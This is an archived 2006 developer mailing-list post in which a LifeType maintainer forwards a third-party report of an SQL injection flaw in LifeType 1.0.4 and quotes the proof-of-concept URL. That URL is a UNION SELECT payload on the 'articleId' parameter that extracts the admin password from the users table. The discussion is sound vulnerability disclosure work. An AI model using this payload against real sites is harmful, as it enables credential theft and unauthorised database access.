[pLog-svn] Fwd: LifeType <= 1.0.4 'articleId' SQL injection
Oscar Renalias
oscar at renalias.net
Sat Jun 3 21:45:04 GMT 2006
I couldn't get the linked script to work, but this is the interesting
part of it:
http://www.yourhost.com/lifetype-1.0.4/index.php?
op=ViewArticle&blogId=1&articleId=9999/**/UNION/**/SELECT/**/password,
1,1,1,1,1,1,1/**/FROM/**/lt_users/**/WHERE/**/id=1/*
Clever.
On 4 Jun 2006, at 00:43, Oscar Renalias wrote:
> Whoops. Our first serious SQL injection issue!
>
> Begin forwarded message:
>
>> From: "rgod" <zerokool_556 at hotmail.com>
>> Date: 4 June 2006 00:30:31 GMT+03:00
>> To: <contact at lifetype.net>
>> Subject: LifeType <= 1.0.4 'articleId' SQL injection
>>
>> http://retrogod.altervista.org/lifetype_104_sql.html
>>
>> rgod
>>
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
>
More information about the pLog-svn
mailing list